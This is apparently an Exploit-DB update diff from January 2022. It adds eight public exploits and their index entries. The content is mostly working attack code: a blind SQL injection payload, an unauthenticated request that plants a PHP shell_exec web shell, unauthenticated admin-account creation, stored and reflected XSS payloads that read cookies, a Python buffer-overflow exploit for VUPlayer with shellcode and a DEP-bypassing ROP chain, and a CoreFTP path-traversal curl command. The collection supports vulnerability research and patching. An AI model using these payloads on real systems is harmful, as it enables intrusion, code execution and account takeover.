DB: 2022-01-11

8 changes to exploits/shellcodes

VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)

CoreFTP Server build 725 - Directory Traversal (Authenticated)
HTTP Commander 3.1.9 - Stored Cross Site Scripting (XSS)
Online Railway Reservation System 1.0 - 'id' SQL Injection (Unauthenticated)
Online Railway Reservation System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated)
Online Railway Reservation System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS) (Unauthenticated)
Open-AudIT Community 4.2.0 - Cross-Site Scripting (XSS) (Authenticated)

exploits/php/webapps/50646.txt

@@ -0,0 +1,22 @@
+# Exploit Title: Online Railway Reservation System 1.0 - 'id' SQL Injection (Unauthenticated)
+# Date: 07/01/2022
+# Exploit Author: twseptian
+# Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip
+# Version: v1.0
+# Tested on: Kali Linux 2021.4,PHP 7.4.26
+
+*SQL Injection*
+SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to it's database. Online Railway Reservation System v1.0 is vulnerable to SQL injection via the 'id' parameter on the Reservation Form.
+
+*Attack Vector*
+An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap.
+
+*Steps of reproduce:*
+Step-1: Navigate to 'Schedule' > go to 'Book' or 'Revervation Form' page using the following URL:
+http://localhost/orrs/?page=reserve&sid=1
+
+Step-2: Put the SQL Injection payloads in 'id' field.
+In this we used time-based blind payload: /orrs/?page=reserve&sid=1') AND (SELECT 6842 FROM (SELECT(SLEEP(5)))UsWr) AND ('WBCm'='WBCm
+
+Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.

exploits/php/webapps/50647.txt

@@ -0,0 +1,38 @@
+#Exploit Title: Online Railway Reservation System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
+#Date: 07/01/2022
+#Exploit Author: Zachary Asher
+#Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html
+#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip
+#Version: 1.0
+#Tested on: Online Railway Reservation System 1.0
+
+=====================================================================================================================================
+Command Execution
+=====================================================================================================================================
+POST /orrs/classes/SystemSettings.php?f=update_settings HTTP/1.1
+Host: localhost
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------41914587873111789572282654447
+Content-Length: 164
+
+-----------------------------41914587873111789572282654447
+Content-Disposition: form-data; name="content[welcome]"
+<?php echo shell_exec('id -a'); ?>
+
+=====================================================================================================================================
+View Output
+=====================================================================================================================================
+GET /orrs/ HTTP/1.1
+Host: localhost
+Content-Length: 2
+
+=====================================================================================================================================
+View Only STDOUT
+=====================================================================================================================================
+curl -i -s -k -X $'GET' \
+    -H $'Host: localhost' -H $'Content-Length: 2' \
+    --data-binary $'\x0d\x0a' \
+    $'http://localhost/orrs/'| sed -n '/\"welcome-content\"/,/<\/div/p' | grep -v '<'

exploits/php/webapps/50648.txt

@@ -0,0 +1,40 @@
+#Exploit Title: Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated)
+#Date: 07/01/2022
+#Exploit Author: Zachary Asher
+#Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html
+#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip
+#Version: 1.0
+#Tested on: Online Railway Reservation System 1.0
+
+=====================================================================================================================================
+Account Creation
+=====================================================================================================================================
+POST /orrs/classes/Users.php?f=save HTTP/1.1
+Host: localhost
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------344736580936503100812880815036
+Content-Length: 602
+
+-----------------------------344736580936503100812880815036
+Content-Disposition: form-data; name="firstname"
+
+testing
+-----------------------------344736580936503100812880815036
+Content-Disposition: form-data; name="lastname"
+
+testing
+-----------------------------344736580936503100812880815036
+Content-Disposition: form-data; name="username"
+
+testing
+-----------------------------344736580936503100812880815036
+Content-Disposition: form-data; name="password"
+
+testing
+-----------------------------344736580936503100812880815036
+Content-Disposition: form-data; name="type"
+
+1

exploits/php/webapps/50649.txt

@@ -0,0 +1,58 @@
+#Exploit Title: Online Railway Reservation System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS) (Unauthenticated)
+#Date: 07/01/2022
+#Exploit Author: Zachary Asher
+#Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html
+#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip
+#Version: 1.0
+#Tested on: Online Railway Reservation System 1.0
+
+1)
+=====================================================================================================================================
+To Store XSS (about_us)
+=====================================================================================================================================
+POST /orrs/classes/SystemSettings.php?f=update_settings HTTP/1.1
+Host: localhost
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------41914587873111789572282654447
+Content-Length: 159
+
+-----------------------------41914587873111789572282654447
+Content-Disposition: form-data; name="content[about_us]"
+
+<svg/onload=alert(document.cookie)>
+
+=====================================================================================================================================
+To Trigger Stored XSS (about_us)
+=====================================================================================================================================
+Browse to http://<ip>/orrs/?page=about
+
+
+2)
+=====================================================================================================================================
+To Store XSS (train code)
+=====================================================================================================================================
+POST /orrs/classes/Master.php?f=save_train HTTP/1.1
+Host: localhost
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------271324269624375374252271437649
+Content-Length: 254
+
+-----------------------------271324269624375374252271437649
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------271324269624375374252271437649
+Content-Disposition: form-data; name="code"
+
+<svg/onload=alert(document.cookie)>
+
+=====================================================================================================================================
+To Trigger XSS (train code)
+=====================================================================================================================================
+Browse to http://localhost/orrs/?page=schedules

exploits/php/webapps/50651.txt

@@ -0,0 +1,33 @@
+# Exploit Title: Open-AudIT Community 4.2.0 - Cross-Site Scripting (XSS) (Authenticated)
+# Date: 01/11/2021
+# Exploit Author: Dominic Clark (parzival)
+# Vendor Homepage: https://opmantek.com/
+# Software Link: https://www.open-audit.org/downloads.php
+# Category: WebApps
+# Version: <= 4.2.0
+# Tested on: Windows 10
+# CVE: CVE-2021-44916
+
+# 1. Vendor Description
+# Open-AudIT is an application to tell you exactly what is on your network, how it is configured and when it changes.
+# Essentially, Open-AudIT is a database of information, that can be queried via a web interface.
+# Open-AudIT will run on both Windows and Linux systems.
+
+# 2. Technical Description
+# There is an issue with link creation in the GUI with Open-AudIT Community.
+# If a bad value is passed to the routine via a URL, javascript code can be executed.
+# This requires the user be logged in to Open-AudIT Community to trigger.
+
+# 3. Proof of Concept
+# Step 1: Login to Open-AudIT via the login page (default credentials are admin/password)
+# Step 2: Enter one of the following PoC URLs, this issue was observed to occur any time there is a file available to be imported: (e.g., http://localhost/open-audit/index.php/attributes/import)
+
+Vulnerable URL 1: "http://localhost/open-audit/index.php/discoveries/import%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22"
+Vulnerable URL 2: "http://localhost/open-audit/index.php/credentials/import%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22"
+
+# Step 3: Observe that the payload successfully executes and a popup is displayed.
+# This vulnerability can be exploited in conjuction with a social engineering attack to potentially obtain sensitive information such a users session cookie.
+
+# 4. Remediation
+# Apply the recommended workarounds and mitigations provided by Opmantek.
+# https://community.opmantek.com/display/OA/Errata+-+4.2.0+and+earlier+Javascript+vulnerability

exploits/windows/local/50650.py

@@ -0,0 +1,84 @@
+# Exploit Title: VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)
+# Date: 26/06/2021
+# Exploit Author: Bryan Leong <NobodyAtall>
+# Vendor Homepage: http://www.vuplayer.com/
+# Software Link: [Null]
+# Version: VUPlayer 2.49
+# Tested on: Windows 7 x64
+# CVE : CVE-2009-0182
+
+# VUPlayer 2.49 Local Buffer Overflow to Arbitrary Code Execution (Importing .wax playlist file) (Bypass DEP protection)
+
+import struct
+
+
+#shellcode
+#msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x1a" -f python
+buf =  b""
+buf += b"\xd9\xea\xba\x33\x44\x3b\x11\xd9\x74\x24\xf4\x5d\x33"
+buf += b"\xc9\xb1\x31\x83\xc5\x04\x31\x55\x14\x03\x55\x27\xa6"
+buf += b"\xce\xed\xaf\xa4\x31\x0e\x2f\xc9\xb8\xeb\x1e\xc9\xdf"
+buf += b"\x78\x30\xf9\x94\x2d\xbc\x72\xf8\xc5\x37\xf6\xd5\xea"
+buf += b"\xf0\xbd\x03\xc4\x01\xed\x70\x47\x81\xec\xa4\xa7\xb8"
+buf += b"\x3e\xb9\xa6\xfd\x23\x30\xfa\x56\x2f\xe7\xeb\xd3\x65"
+buf += b"\x34\x87\xaf\x68\x3c\x74\x67\x8a\x6d\x2b\xfc\xd5\xad"
+buf += b"\xcd\xd1\x6d\xe4\xd5\x36\x4b\xbe\x6e\x8c\x27\x41\xa7"
+buf += b"\xdd\xc8\xee\x86\xd2\x3a\xee\xcf\xd4\xa4\x85\x39\x27"
+buf += b"\x58\x9e\xfd\x5a\x86\x2b\xe6\xfc\x4d\x8b\xc2\xfd\x82"
+buf += b"\x4a\x80\xf1\x6f\x18\xce\x15\x71\xcd\x64\x21\xfa\xf0"
+buf += b"\xaa\xa0\xb8\xd6\x6e\xe9\x1b\x76\x36\x57\xcd\x87\x28"
+buf += b"\x38\xb2\x2d\x22\xd4\xa7\x5f\x69\xb2\x36\xed\x17\xf0"
+buf += b"\x39\xed\x17\xa4\x51\xdc\x9c\x2b\x25\xe1\x76\x08\xd9"
+buf += b"\xab\xdb\x38\x72\x72\x8e\x79\x1f\x85\x64\xbd\x26\x06"
+buf += b"\x8d\x3d\xdd\x16\xe4\x38\x99\x90\x14\x30\xb2\x74\x1b"
+buf += b"\xe7\xb3\x5c\x78\x66\x20\x3c\x51\x0d\xc0\xa7\xad"
+
+junk = "A"*1012
+
+#no ASLR modules
+#BASS.dll
+#BASSMIDI.dll
+#BASSWMA.dll
+
+#check bad chars
+#badchar = \x00, \x0a, \x1a
+
+#ROP Chains
+#!mona rop -m BASS.dll,BASSMIDI.dll -n -cpb '\x00\x0A\x1A'
+def create_rop_chain():
+
+    rop_gadgets = [
+      0x10015f77,  # POP EAX # RETN [BASS.dll]
+      0x1060e25c,  # ptr to &VirtualProtect() [IAT BASSMIDI.dll]
+      0x1001eaf1,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [BASS.dll]
+      0x10030950,  # XCHG EAX,ESI # RETN [BASS.dll]
+      0x1001d748,  # POP EBP # RETN [BASS.dll]
+      0x100222c5,  # & jmp esp [BASS.dll]
+      0x10015fe7,  # POP EAX # RETN [BASS.dll]
+      0xfffffdff,  # Value to negate, will become 0x00000201
+      0x10014db4,  # NEG EAX # RETN [BASS.dll]
+      0x10032f32,  # XCHG EAX,EBX # RETN 0x00 [BASS.dll]
+      0x10015f77,  # POP EAX # RETN [BASS.dll]
+      0xffffffc0,  # Value to negate, will become 0x00000040
+      0x10014db4,  # NEG EAX # RETN [BASS.dll]
+      0x10038a6d,  # XCHG EAX,EDX # RETN [BASS.dll]
+      0x100163c7,  # POP ECX # RETN [BASS.dll]
+      0x1060da06,  # &Writable location [BASSMIDI.dll]
+      0x10603658,  # POP EDI # RETN [BASSMIDI.dll]
+      0x1001dc05,  # RETN (ROP NOP) [BASS.dll]
+      0x10015fe7,  # POP EAX # RETN [BASS.dll]
+      0x90909090,  # nop
+      0x1001d7a5,  # PUSHAD # RETN [BASS.dll]
+    ]
+    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
+
+rop_chain = create_rop_chain()
+
+#give some space between shellcode & ropchain
+nop = "\x90"*16
+
+payload = junk + rop_chain + nop + buf
+
+f = open("poc.wax", "w")
+f.write(payload)
+f.close()

exploits/windows/remote/50652.txt

@@ -0,0 +1,15 @@
+# Exploit Title: CoreFTP Server build 725 - Directory Traversal (Authenticated)
+# Date: 08/01/2022
+# Exploit Author: LiamInfosec
+# Vendor Homepage: http://coreftp.com/
+# Version: build 725 and below
+# Tested on: Windows 10
+# CVE : CVE-2022-22836
+
+# Description:
+
+CoreFTP Server before 727 allows directory traversal (for file creation) by an authenticated attacker via ../ in an HTTP PUT request.
+
+# Proof of Concept:
+
+curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops

exploits/windows/webapps/50645.txt

@@ -0,0 +1,24 @@
+# Exploit Title: HTTP Commander 3.1.9 - Stored Cross Site Scripting (XSS)
+# Date: 07/01/2022
+# Exploit Author: Oscar Sandén
+# Vendor Homepage: https://www.element-it.com
+# Software Link: https://www.element-it.com/downloads.aspx
+# Version: 3.1.9
+# Tested on: Windows Server 2016
+
+[Description]
+There is a stored XSS in the 'Zip content' feature of the HTTP commander application. The vulnerable field is the filename of the files inside the zip. This vulnerability exists in 3.x of the HTTP commander application.
+
+[Steps to reproduce]
+1)	Create a file with a xxs payload in its name. Examples:
+<img src=x onerror=alert(1)>.txt
+<img src=x onerror="document.location='https:'+String.fromCharCode(47)+String.fromCharCode(47)+'exploit-db.com'">.txt
+Or some other JS you like.
+2)	Zip the files
+3)	Upload the ZIP-file
+4)	In HTTP commander, right click the file and select ZIP-content.
+5)	If the files are in a subfolder, expand it until the filenames are shown.
+
+[Exploit]
+touch payload/<img src=x onerror=alert(1)>.txt
+Zip -r test.zip /payload

files_exploits.csv

@@ -11429,6 +11429,7 @@ id,file,description,date,author,type,platform,port
 50598,exploits/windows/local/50598.txt,"Microsoft Internet Explorer / ActiveX Control - Security Bypass",1970-01-01,hyp3rlinx,local,windows,
 50633,exploits/windows/local/50633.txt,"TRIGONE Remote System Monitor 3.61 - Unquoted Service Path",1970-01-01,"Yehia Elghaly",local,windows,
 50642,exploits/windows/local/50642.ps1,"Automox Agent 32 - Local Privilege Escalation",1970-01-01,"Greg Foss",local,windows,
+50650,exploits/windows/local/50650.py,"VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)",1970-01-01,"Bryan Leong",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18593,6 +18594,7 @@ id,file,description,date,author,type,platform,port
 50638,exploits/windows/remote/50638.txt,"TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)",1970-01-01,"Fabiano Golluscio",remote,windows,
 50639,exploits/hardware/remote/50639.txt,"Dixell XWEB 500 - Arbitrary File Write",1970-01-01,"Roberto Palamaro",remote,hardware,
 50640,exploits/python/remote/50640.py,"Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Jeremiasz Pluta",remote,python,
+50652,exploits/windows/remote/50652.txt,"CoreFTP Server build 725 - Directory Traversal (Authenticated)",1970-01-01,LiamInfosec,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -44724,3 +44726,9 @@ id,file,description,date,author,type,platform,port
 50641,exploits/php/webapps/50641.txt,"Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)",1970-01-01,"Oscar Gil Gutierrez",webapps,php,
 50643,exploits/php/webapps/50643.txt,"WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Andrea Bocchetti",webapps,php,
 50644,exploits/php/webapps/50644.txt,"Online Veterinary Appointment System 1.0 - 'Multiple' SQL Injection",1970-01-01,twseptian,webapps,php,
+50645,exploits/windows/webapps/50645.txt,"HTTP Commander 3.1.9 - Stored Cross Site Scripting (XSS)",1970-01-01,"Oscar Sandén",webapps,windows,
+50646,exploits/php/webapps/50646.txt,"Online Railway Reservation System 1.0 - 'id' SQL Injection (Unauthenticated)",1970-01-01,twseptian,webapps,php,
+50647,exploits/php/webapps/50647.txt,"Online Railway Reservation System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Zachary Asher",webapps,php,
+50648,exploits/php/webapps/50648.txt,"Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated)",1970-01-01,"Zachary Asher",webapps,php,
+50649,exploits/php/webapps/50649.txt,"Online Railway Reservation System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS) (Unauthenticated)",1970-01-01,"Zachary Asher",webapps,php,
+50651,exploits/php/webapps/50651.txt,"Open-AudIT Community 4.2.0 - Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Dominic Clark",webapps,php,